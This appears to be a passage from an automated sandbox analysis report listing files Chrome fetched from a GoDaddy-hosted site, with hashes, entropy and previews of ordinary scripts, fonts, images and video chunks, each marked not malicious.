                                      Preview:(()=>{"use strict";var e={895:()=>{try{self["workbox:cacheable-response:6.4.1"]&&_()}catch(e){}},259:(e,t,s)=>{s.d(t,{B:()=>a}),s(913);class a{constructor(){this.promise=new Promise(((e,t)=>{this.resolve=e,this.reject=t}))}}},125:(e,t,s)=>{s.d(t,{V:()=>a}),s(913);class a extends Error{constructor(e,t){super(((e,...t)=>{let s=e;return t.length>0&&(s+=` :: ${JSON.stringify(t)}`),s})(e,t)),this.name=e,this.details=t}}},524:(e,t,s)=>{s.d(t,{h:()=>a}),s(125),s(913);const a=null},594:(e,t,s)=>{function a(e,t){const s=new URL(e);for(const e of t)s.searchParams.delete(e);return s.href}async function n(e,t,s,n){const r=a(t.url,s);if(t.url===r)return e.match(t,n);const i=Object.assign(Object.assign({},n),{ignoreSearch:!0}),c=await e.keys(t,i);for(const t of c)if(r===a(t.url,s))return e.match(t,n)}s.d(t,{F:()=>n}),s(913)},536:(e,t,s)=>{s.d(t,{x:()=>r}),s(913);const a={googleAnalytics:"googleAnalytics",precache:"precache-v2",prefix:"workbox",runtime:"runtime",suffix:"undefined"!=typeof registratio
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=1], baseline, precision 8, 474x266, components 3
                                      Category:dropped
                                      Size (bytes):24831
                                      Entropy (8bit):7.9461664528040235
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:47854C6AA1D95639FCDCD578FEF6C50D
                                      SHA1:E326A1AC4BAA5E457BFB3A332AC9582FFE94B331
                                      SHA-256:B4A61E1904C2F9DB76E66A3A573340ECB95CD1B5586E5297DDBBF9204A46D16F
                                      SHA-512:FBF1426ACE1DAAB103D8B97D04A697DB63A8537808ED83CAEFD7C83765B3CF1EAD5CC0DBBE86855917F2CCB0FB48DFE62B1DBFB1626E7A43BB684B17D8BBA949
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:......JFIF.............BExif..MM.*.......i................@........m..@....................C.......................................%..%....)).%756.*2>-)0.;!....C...........,...,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..u....n.#3+..=z.qY.]NqN.J8.G...]...{+H..l...!...?Jo......B..}..(..i.2.8$~B.f.........7..#.vXi.lnL..?.B.C......h.-.u..kG....aR:...?Z...L9.q.F).....e/4..\.ph..b....7.Q.v.1A<..^h..).qAaR.?QQ..qI.^..d~....6.....{g.R'..=}....d... 8 ...".G....G.f....x\.........Bl...i.1...WadDS...=..*|).F.4..qD#....z.
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=1], baseline, precision 8, 474x266, components 3
                                      Category:dropped
                                      Size (bytes):39253
                                      Entropy (8bit):7.961509783693723
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:ED17E34CAD59008BC334CDE0A7F89238
                                      SHA1:8215821BC3B9A54021CC65E84D35C1A88E2879D4
                                      SHA-256:A2AF118D78CB1793AB54FA639D694F1C5B224227B64AE3B889DA6D5B00D7CC26
                                      SHA-512:B3BDE74C28A844894884BECAAF0C3B98EAB71E1D51FEBDA0386E61E2378D65ACEA688A79AAD35935AD0635C60CFACAE1D049589F7755BA97F868528628A89E81
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:......JFIF.............BExif..MM.*.......i................@........|..@....................C.......................................%..%....)).%756.*2>-)0.;!....C...........,...,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...2.....?.O..Cn-.`..f.NX..5F.f........LV....e.N3....f..?5.29..J....I#.)>a;.B.iB.:t4D...X ....[.&.*H...cr.j...<v..Z...H..\~.%@P...?.U..7.VX.$.... ..A.)C.,#.HO..;y...v..dw.....C......0I......IrY.1.J..w....6.U. a../.....qA...*`.........v.*G]6..g.p2.*..:.b[9....U..!s..:s..}*R....I.:.q.0.v2..2.c.
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (905)
                                      Category:dropped
                                      Size (bytes):960
                                      Entropy (8bit):5.203352394673048
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:62A914B2C847D4D02B76164D7A2A54C6
                                      SHA1:20D9F49A90A51FA6C8420640610DF77F7A96D919
                                      SHA-256:B08C2864EC27736C507B1CA4B3A225A19147841B861CD8494DAF95FA370FE639
                                      SHA-512:E67D3D9F68EF3151D93DEDAA3530DF89F0C957F08561E93134B219DEC23C2A1FE0D109AC666619526742C5411E4636ECE416A3AD1148C1AD0861F0050B41D3DE
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:define("@wsb/guac-widget-shared/c/_commonjsHelpers-67085353.js",["exports"],(function(e){"use strict";var n="undefined"!=typeof globalThis?globalThis:"undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};e.a=n,e.b=function(e){if(e.__esModule)return e;var n=Object.defineProperty({},"__esModule",{value:!0});return Object.keys(e).forEach((function(t){var r=Object.getOwnPropertyDescriptor(e,t);Object.defineProperty(n,t,r.get?r:{enumerable:!0,get:function(){return e[t]}})})),n},e.c=function(e,n,t){return e(t={path:n,exports:{},require:function(e,n){return function(){throw new Error("Dynamic requires are not currently supported by @rollup/plugin-commonjs")}(null==n&&t.path)}},t.exports),t.exports},e.g=function(e){return e&&e.__esModule&&Object.prototype.hasOwnProperty.call(e,"default")?e.default:e}})),"undefined"!=typeof window&&(window.global=window);.//# sourceMappingURL=_commonjsHelpers-67085353.js.map.
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:Web Open Font Format (Version 2), TrueType, length 33092, version 1.0
                                      Category:downloaded
                                      Size (bytes):33092
                                      Entropy (8bit):7.993894754675653
                                      Encrypted:true
                                      SSDEEP:
                                      MD5:057478083C1D55EA0C2182B24F6DD72F
                                      SHA1:CAF557CD276A76992084EFC4C8857B66791A6B7F
                                      SHA-256:BB2F90081933C0F2475883CA2C5CFEE94E96D7314A09433FFFC42E37F4CFFD3B
                                      SHA-512:98FF4416DB333E5A5A8F8F299C393DD1A50F574A2C1C601A0724A8EA7FB652F6EC0BA2267390327185EBEA55F5C5049AB486D88B4C5FC1585A6A975238507A15
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://img1.wsimg.com/gfonts/s/montserrat/v26/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2
                                      Preview:wOF2.......D......6...............................a......Z?HVAR...`?STAT.8'2..F/~.....|.M....0....6.$.... ..x..<..[.%Q.i.<.N..t.Yx..5.A...|..g#l....5.....D.Bt.......l.Y].)..(..H.s..V..r*uM....[.**....I.0h.v.Hc.R..]....`$.I)G.+.}....E%.H..|..%nEE.....+.x..7|........[..V....[.......0...CA.._....)2.$.....s_fw....+.V.H.B.<?.?..mloc..1.Q....a.r#...)......|.F>..../6-.......t......>......tO.:f@b....u.I(.Bc..b....7.?A.....vE.}...kb]W7.h..$@......T1t.8.._?...~..,..I..."Y...1..s.V........R.Bf2..I....s.........u.P.&..D./"2qf....p.sv..)b5.yR.$MR3.@.E../>{w.....f...cN...2.v.....]>..Ow...9/!v...r..1.4.n.w...T......=...hRH!.....2`...u..82L...S.v.ik^.V.....@..N....d{..{...NN"'.H...H$..H.<..{?..x.....zv.}.~.N)4.g...X.....8|}...e,%.:..;.Q..88...@..=UVHe....g..zD?..U...~.J...oMoP..6B"Y.{BN...vY<.o..r.7.7j%.Z%.'...]...........YK...,.a-;.M....>\.......%'+8Z.1K.y...9.(;.5 ..M..L.(..9...T)........hx..i2Y...m*..{ulY...d......")^.,.n.~..r..S.o.$.....6=.i...N.....q0 ....
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (1352)
                                      Category:dropped
                                      Size (bytes):1400
                                      Entropy (8bit):5.307032039583678
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:5CC6B93D41889C0A55C6C4FCD2D89713
                                      SHA1:51A59C1DAE337817C4EBAC39FBE61C232705A893
                                      SHA-256:8671CFDFA128168DB2136D7C17F55BA98DDBA221CDD1ACBBE559D4969280FD51
                                      SHA-512:8BCAAB1399B6D4D7475C4CF1DC45B0477A9D2AD37578DFCCF23C0C9303716DA1DECD5FBA858D5DD609CB89BCC784E04B72A0D7136BC6EE60DC3EF69CAB977C33
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:define("@widget/LAYOUT/c/bs-index2-87bd33e6.js",["exports"],(function(t){"use strict";t.a=function(){let t=arguments.length>0&&void 0!==arguments[0]?arguments[0]:"medium";return{"> :nth-child(n)":{marginBottom:t}," > :last-child":{marginBottom:"0 !important"}}},t.b=function(){let t=arguments.length>0&&void 0!==arguments[0]?arguments[0]:"medium";return{"> :nth-child(n)":{marginRight:t}," > :last-child":{marginRight:"0 !important"}}},t.c=function(t){const e=function(t){if("string"!=typeof t||"{"!==t[0])return null;try{return JSON.parse(t)}catch(t){return null}}(t)||{};let n=0;return e.blocks&&e.blocks.forEach((t=>{const e=t.text.length;n+=(global._||guac.lodash).clamp(e,25,Math.max(e,25))})),n},t.g=()=>{const t=document.getElementsByClassName("ux-scaled");let e=1;return t&&t.length>0&&(e=t[0].getAttribute("data-scale")),e},t.r=t=>{let{count:e=0,fontSizeMap:n={},defaultFontSize:r}=t;const i=(global._||guac.lodash).reduce(n,((t,e,n)=>{let[r,i=Number.MAX_VALUE]=e;return t.push({range:[r,i],
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:data
                                      Category:downloaded
                                      Size (bytes):1048576
                                      Entropy (8bit):7.999816834041507
                                      Encrypted:true
                                      SSDEEP:
                                      MD5:D59774D47E49FCE5195B8962BE2FDD34
                                      SHA1:DF8AAC4F5F72DC98939CF88AF701A230EF46495B
                                      SHA-256:58F5F396C2F52057583B4AF161BF844868DE57D9C787991C11BD3AFE1FD9E04C
                                      SHA-512:593EE69847D5F2F897BDD4C4F06D1CE264285BE952CA4AE464095EA36BA18146BEBDE36852FC8883654CCF3FAE6E2915747F1C1CB3AA2F25680F7B9DCD4DB04E
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://websites.godaddy.com/categories/v4/videos/raw/video/uA41GmyyG8IMaxXdb:2f83d80d859def:2e
                                      Preview:~.B..@.Y.....D.. .y>1h9...D@.9...l./..O..Hd......o.^5.~-..>.\..k...5........8.I...y1e.#..p.B<.....(_}...[.......q....J...._....."...'k..6!m..]c.X............."_......e..9....?..........8...D.x8..C.........t+)....j"...>s.....]Z8h..pzZ....z<....{._d...A.&$."/Mh.v......|,So...P...x.SJPJ.qHB.;..f..>.......^.^-.y......Q=.... ...*~..y...r.l..'wo.... .S.'..T.i.;.$n...r.8*..5Hl..^9..{..E.|...+b.......#o7tyL..z&sY.:z..........B..o.M.z..........Z..a......pD.-dL...@ z:<A.}.g.LW..[..D0.m ...-.e.O..v|6{r9p.]./..l.....j....G>)g4Q...8(g..5..>..G..9...A|...2......sPE.*.,..zC/;.Z..$.n..`......x@T6.~.Q..j.O.j...F...P..V......K^.7GF.*...yLG...)=..<....5FdJ;..y....*..a........b3yi..C(..l_....N.....O9.i..Vju.C!iQ.m..2{.!..<....*..4....@...Ev........xx..'F...#....A...=y.........]...N.nX..t.9.L.|>.K.A..zq....._8.3.b..2....U..;C...x......j...;....,.V.#ap...Yq.w0.N.4. =..T.`..zp8..cN..P#..(.p!..........)b..@....H]S....c>-..;i ..*...a4].=.Oi%e2z..L@>.?B....gI5.
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (47671)
                                      Category:downloaded
                                      Size (bytes):47672
                                      Entropy (8bit):5.4016434300784555
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:EC4B20037C896C5F60640105C6EA36B1
                                      SHA1:A9A74169679305B6EF1B76470F5CB746D9420213
                                      SHA-256:FBACCE424D00878284DB8C04089F007944324D9CD2432DB2472E4CF62A39DBBF
                                      SHA-512:1AD0209E6BEFE4444E62BFD01EA8FC5302674A047313908E963AFB787D83E572DB6AEF7EFEBB6D294A0310DECD51E54C17ACE28E7CDF651BB588AE4A17030102
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://challenges.cloudflare.com/turnstile/v0/b/e1a56f38220d/api.js
                                      Preview:"use strict";(function(){function Ht(e,r,n,o,c,l,g){try{var h=e[l](g),u=h.value}catch(f){n(f);return}h.done?r(u):Promise.resolve(u).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var l=e.apply(r,n);function g(u){Ht(l,o,c,g,h,"next",u)}function h(u){Ht(l,o,c,g,h,"throw",u)}g(void 0)})}}function V(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):V(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:data
                                      Category:downloaded
                                      Size (bytes):1048576
                                      Entropy (8bit):7.979947101245615
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:7C143E41CD0403564509CCDC4FDCAFE6
                                      SHA1:D006FE9562137E2104997835CEEB9C12C7350D5C
                                      SHA-256:0FCD62BC5ABE3E3867B6259489102097BF178F66DDC46F65FB27EE945C7DAB7E
                                      SHA-512:85EC7E98E806A597724A1905E7884845AF10D611F23B16A03156401396788513E9F373DBB697C793FD7BA722B9485AF9B5C1F1F90A98BE73F162935BDCE19298
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://websites.godaddy.com/categories/v4/videos/raw/video/uA41GmyyG8IMaxXdb:2f83d80d859def:2b
                                      Preview:S....c..&9.!.:......-[0..6.....3$Mp.%ox3.Fx.KG.k.....e....Oe..Z.t1:{..3.....3V....G....h.z... ...B9.wew...G.Bs...cd..}...e..pa...~.I.#....esM.xc^.7d.A..{.....7]..+m."B ^<..&..1..7....x4......+.3n"...r...$.r..4c.....4.*...<.v1..)5,..*.G/..1..5af.b.........j.:S..5.-.;..b+..+.K.h~=..6)..s.0.T(t.........;..-.m.).-.(....&...$`#?.Q........3..Z Q....m.1w....^..G.HH...'.?'n.!6S....M..=P..VX..W...L..Fpu\\kk..m..c%........M.d!..<rZ..B..\.v:...Xx..Q.~.p.j..z..<.xK}.y...n..NK..{..0...L.1..?-.W+ ...l.........s..i.b?.j_...........t.wG.Q.|..(f^..[!,.p.!....y.[..Z\"....B......9...*>..*.x.4..c..)Qo...C....B06..}Ta...]....Vo....... .m.....Y[NS4>..[.1.p.#..,.....J.t@.R..&X....g.w1....Nc.w...`5....#.$.~].....e./...W..N..6..Z..n+..f`.....Q$ML..x$7S2K.la.O2D..B.f.u.r5........Y.U.........R[.6RBlZVG....cT.d.a.....%r.......".a...4vs.AM-.H.....7#..{oB....jR....e..P?.H..*._.....9......e.%J..Rt...C^\.MY.$..X.J. ...<.."pW...Yg..*#q..%..a.....96..^7...
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (1824)
                                      Category:downloaded
                                      Size (bytes):1874
                                      Entropy (8bit):4.934407477113311
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:EDC15AD5DAAC3CFA744BFFDB1E0174BE
                                      SHA1:E314A5CA702D0E77B2C2C023ADDADE266EA223B2
                                      SHA-256:3B54AEACFDA01BE53800632989A82F6F5A7F92E927159A37A4324B38D3DFFEF8
                                      SHA-512:8B8805D67FF993BD406EEB6682B1578537A3D6B7DC6711BE7152120689C77147D8C24351ACEBD2A06AE9B81D858EAED19C44E6792FE3C147EEAF3133C635589B
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://img1.wsimg.com/blobby/go/static/radpack/@widget/LAYOUT/c/bs-dataAids-6a839d53.js
                                      Preview:define("@widget/LAYOUT/c/bs-dataAids-6a839d53.js",["exports"],(function(E){"use strict";var R=(global.keyMirror||guac.keymirror)({BACKGROUND_IMAGE_RENDERED:null,HAMBURGER_MENU_LINK:null,HEADER_WIDGET:null,HEADER_SECTION:null,HEADER_VIDEO:null,HEADER_VIDEO_EMBED_WRAPPER:null,HEADER_VIDEO_EMBED:null,HEADER_VIDEO_EMBED_INSET_POSTER:null,HEADER_VIDEO_EMBED_FILL_POSTER:null,HEADER_VIDEO_BACKGROUND:null,HEADER_SLIDESHOW:null,HEADER_SLIDE:null,HEADER_HERO_SLIDE:null,HEADER_PHONE_RENDERED:null,HEADER_PIPE_RENDERED:null,HEADER_ADDRESS_RENDERED:null,HEADER_LOGO_RENDERED:null,HEADER_LOGO_IMAGE_RENDERED:null,HEADER_LOGO_OVERHANG_CONTAINER:null,HEADER_LOGO_TEXT_RENDERED:null,HEADER_TAGLINE_RENDERED:null,HEADER_TAGLINE2_RENDERED:null,HEADER_NAV_RENDERED:null,HEADER_CTA_BTN:null,CART_ICON_RENDER:null,CART_ICON_COUNT:null,CART_ICON_PIPE:null,CART_TEXT:null,CART_DROPDOWN_RENDERED:null,SEARCH_FORM_RENDERED:null,SEARCH_ICON_RENDERED:null,SEARCH_ICON_RENDERED_OPEN:null,SEARCH_CLOSE_RENDERED:null,SEARCH_FI
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:data
                                      Category:downloaded
                                      Size (bytes):1048576
                                      Entropy (8bit):7.978406006002462
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:9C480766ED142149497CA9C6DBD88EFF
                                      SHA1:18098A702B880A1028672F390DF6205314359CF4
                                      SHA-256:8FE580929B1EA3B2BC2E085C7B539196F245A3B2667778BFA0FF7779516C7B99
                                      SHA-512:1BC11B73B546C621F1E012243334A4FC7DB3C333976279FE76DA07A578878EB5462C0A2AEF0428EBA3553F6034861D7F5FDAB1866EBE6C5433564F5714B4D61D
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://websites.godaddy.com/categories/v4/videos/raw/video/uA41GmyyG8IMaxXdb:2f83d80d859def:b
                                      Preview:...bJC.dG8...6y..U.....F..f....^&d!...6*..X...?....0../Z..<.Wu\"...C..Ox!...]@h..z..*.....8....|...i....>.f.. .asSsohO.^.....{V..= ......v.{ Z2.. ...n...'.>WT.V......V......9^g...0...M....3W'.z.0.n..=......L..;../..z)..F.....<v...78.-8..Y...Y..=..2.w......!...0)...w.{. ..u$.%B+..S...wB..U..6yuO.U>.L0.qp...~...b...NGv.Cs....x.R5..V.v.!.DP.]f...Q.l...|.%...W...@..S..6VB.f.T..A..._.jNA.$..7...~tL...|f....1.E.....r.=..K.%n..z7i..VM..L.[.p...`...6Ti.'.D.m.~..|S...n..-S.......li..}.....F+.B..8..iyf^+.....u.;.WCMH.<...j%....eE.i..M...<X3{).x.jf...|..K.O.S....WsC.(l......:.......i.[.,..].d.......=.I{.h.X.....1'4.,..$..../.........?..S..^.y...J.a.|<...O".q...a.5.62..f.....!.4.&uJ..eIO,v........L...k...~..7.<.K.M,.m.Q...&....d.".s..F.=....<Y..v.{.(.%JD....2.wC...=.&.8B...u..@..8..w....5|....U91..@}A.2..y..q]..T..d.~....K.,.).z....Q.U... ~.8...5..i.e..J..D~Q.=...95d.t[.-..7.b......_D.W....o.T... .....p..3.O........*.rd.....6.......Sy..YL....He
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:PNG image data, 166 x 75, 8-bit colormap, non-interlaced
                                      Category:dropped
                                      Size (bytes):3895
                                      Entropy (8bit):7.9419531006717925
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:46C04DB78166E390949A9059491606CF
                                      SHA1:726D49C50A792A4B64FDA39E8F3D3B47BA6A7DBF
                                      SHA-256:A7883A578795FE7178AA256D5B7A1829A89901D1CA2B390EE9C84015D8239AE6
                                      SHA-512:D0ABBBDAB22EF47FEF2340F4E2F228BACE7004FE8BA0DB79610616E8167315017D0F68CCF82F82ED525B00B328AE6800B9AE1942D64AF699FAB578740E9A0170
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:.PNG........IHDR.......K............PLTE....................................h..l..Oz.X..].....Kw.T~....?n..........%%%....................................+++...000...HHH......lll^^^{{{...WWW...GGG...(((...ccc---...111555......jjj....................UUU...DDDRRR............VVV..............***......,,,JJJPPPMMM............777.................III...................FFF...333..."""ZZZ.......rrr...@@@sss;;;$$$......~~~...___...'''...\\\>>>......YYY......BBB.........................KKK:::...LLLggg......SSS......ppp...888.........dddi.........QQQ???...vvv......oooyyy.......U..[[[...P{.kkk...```...###.........OOO..........===...eeeHu.Lx.Q|....>n...&&&..............Z....9j.... ...7h....xxxY..]..m..uuuwwwhhh|....Jv....@o.q..b........c..@n....y....~..X..k...........f........5g....G....pHYs..........{Rk....IDATh..w\TW......N.&...8H..u....5*B"(H..b...P.X...X..X...l,.b.f..dS7.......f``...1....3..{.=..s....|c.a...WN.0....{=..h+.~...>..G.o..c.>.].R.....k+...m./
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (966)
                                      Category:downloaded
                                      Size (bytes):1022
                                      Entropy (8bit):5.168862244232466
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:352FFAB43E1CEC3BB949809E347B423B
                                      SHA1:F08547F3BC7D5D8C8FA6F058DFFE5D68AA42E943
                                      SHA-256:E2AA142D9E27BD75B23BB0827CEDB6E05CCDD2AD42C9ACC1D4597B2DD4093EB5
                                      SHA-512:3E1464D4F7E36C88541B6BBFACA373EEF66E5057346C113D1A0858452191296B380DCFBF211514203DFC5F75FCD302D7B35122E2FA21BBEC490A77D556A99069
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://img1.wsimg.com/blobby/go/static/radpack/@wsb/guac-widget-shared/c/dynamicFontScaler-ecd443bf.js
                                      Preview:define("@wsb/guac-widget-shared/c/dynamicFontScaler-ecd443bf.js",["exports"],(function(e){"use strict";const t={wordWrap:"normal !important",overflowWrap:"normal !important",display:"none",visibility:"hidden",position:"absolute",width:"auto",overflow:"visible",left:0};e.d=function(e){let{text:a,containerId:n,font:o,fontSizes:i,style:r,Tag:l=(global.Core||guac["@wsb/guac-widget-core"]).UX2.Element.Element,typography:c,targetId:d,maxLines:s=3,prioritizeDefault:g}=e;const p={containerId:n,targetId:d,fontSizes:i,maxLines:s,prioritizeDefault:g};return{element:(global.React||guac.react).createElement((global.React||guac.react).Fragment,null,i.map((e=>(global.React||guac.react).createElement(l,{tag:"span",key:e,font:o,style:{...r,...t,fontSize:e},"data-size":e,"data-scaler-id":`scaler-${n}`,typography:c,"data-ux":"scaler","aria-hidden":!0},a)))),scriptProps:p,callback:()=>window.wsb.DynamicFontScaler(p)}}})),"undefined"!=typeof window&&(window.global=window);.//# sourceMappingURL=dynamicFontS
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=1], baseline, precision 8, 474x266, components 3
                                      Category:dropped
                                      Size (bytes):33484
                                      Entropy (8bit):7.959003787266546
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:C7E59E97AE844EF5C0272D25B01B95DF
                                      SHA1:DD9D69F7DBDC64D028808EB8B8C2854DB90C1A84
                                      SHA-256:DAE07628E1FFAFDEB1948E1062023AC5D8E2A5E3F1A2DA1538365CB79E9D97B1
                                      SHA-512:057600BBE610C2FCC024356F208081827F63E6F90026703D241CDCF768C04213706BB7378EAFE43B23DDFA4AA3C500BCBCDB4AF3D1CF0717D823A081EDEF89AC
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:......JFIF.............BExif..MM.*.......i................@........d..@....................C.......................................%..%....)).%756.*2>-)0.;!....C...........,...,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...}.....O..D...".......I...&.K..w..p.0|...A'....Z2.....21...+..+.[.yb...U..UcJ0..m~..#...8..4..n...'r....}.J4-t.R..o...@..T...k_.z,.I../6..i\........ s..|.C.kG.3j.`FT..!s.....^.l<eM.u..8.Q.+.d...mB[.p.S..+...9.{.....x...r..;M........+....d...7!#h..~....#.9...X......B..o8X.0.\....w<..5..|......(
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=1], baseline, precision 8, 474x296, components 3
                                      Category:downloaded
                                      Size (bytes):32396
                                      Entropy (8bit):7.954723694310075
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:96A20571E197119331D5FA59F3CFAC35
                                      SHA1:2691074876944361E77514A08F940EA7A6C9B7E9
                                      SHA-256:1B6B7FBBFF25DE2859206C740A6AAD89C787C063C72538C9854C71FF326E6C95
                                      SHA-512:13D4B68BEA0F37160099682783675DDA20F7BFC170C154884B54FA172476FB4C7357A973ED1D2A3BE1024172F50F3F01015E50FD20207C9B7185E95618113126
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://th.bing.com/th/id/OIP.G8gvMXftKHZ9cMnfsXLgRQHaEo
                                      Preview:......JFIF.............BExif..MM.*.......i................@........5..@....................C.......................................%..%....)).%756.*2>-)0.;!....C...........,...,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,......(...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....jT....&...u...\w...OZ..x...<...Qb....PK...y.E....GJ.*.bI.L..g.y..NJ...Y.YN......@9a.#..G'.w.S...9.l.'...l........;..j.r9L..S*..WM...;F...........v8.+[.b...n.c.h..B.dt. .?*.t.2.......z.U...0{...r][.+..d..5....)..03.k...$d..F95W.Q..|v...n.f.B.........J...%#..{.........U.....0`..V.......8.EY6pg
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:data
                                      Category:downloaded
                                      Size (bytes):1048576
                                      Entropy (8bit):7.980056683290279
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:EA281F28D489B453A3C508F7A318BF78
                                      SHA1:B84F00CD964972D5E2F005D4079B7999F546F4E8
                                      SHA-256:B39015E0CD4A9A14563DCA4DF0BDAEEC19A1A9651A3FFDCC57C7409553A96F62
                                      SHA-512:9E6AB14F6A61ACDA1C2D57FBCBFA336E9D177D98D95D8203A1722C7A6E64E045770208E9169AB018848E9EA3DB9B26B261621E7F76716D04A2CE1F06BDDCF534
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://websites.godaddy.com/categories/v4/videos/raw/video/uA41GmyyG8IMaxXdb:2f83d80d859def:29
                                      Preview:...*....(m.68!o7<..>.C|8.eg......h.L..e.E.........A.Y.....Z...j.W...n....B..}.kM.{TC.<.8..|...*..[)Y...`..U.}....T.f....f.)...j...oY.z.bP...k.}.o.SL.j.+.'.....,..<TDQ....-.D.m.7|...^.....G0....hvm...v.....Y.I..g?.... ].....s].k.RS...x......@...U......._.......cl..~.09(Hr..G.*._D.....p!..w...e....Y\V.....'...A).\...p.....x..DY.[.7.j.:.8.b.Pt.......N..L....(8_>@%c.9.>.mY.....NDx4.!.d..!*H..l...d;.J.y#....q.|=.......y..x..9...5B~.k+.Y.^Pw5....:.Z1#,."..|..+.*D=.-......|...H..i....72....d..7.:..e3.y.....>X+.....S...I..,y...+[qz.T...E.......U."....~.M....../R.$/M....a..wh.W.X...i..jb+....7w)36. \....i.S...AL..R..Omd...1.J;i..u}.H.....rI.m..{g....#`>j.d....;[+.....M..3~....P|-./p.n.#v.i.2..C.#D....N....+.iE..`..Nby.....2....7R.[....L...b......|..{z%....e..+.Q.`...L..(R....>9,.dI6.....Yi.L.....t.v....q3..d.Z.FwQ...jmQ...}u.>tT)./.....{.q&.....cI...=_:.......-.y.D.T....a.......5|.7..y"EPQ<s.p..q.. ..^.0.W.vB..N.?..Q!M.}.U...SK...!....N..|..>.n..
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ISO Media, MP4 v2 [ISO 14496-14]
                                      Category:downloaded
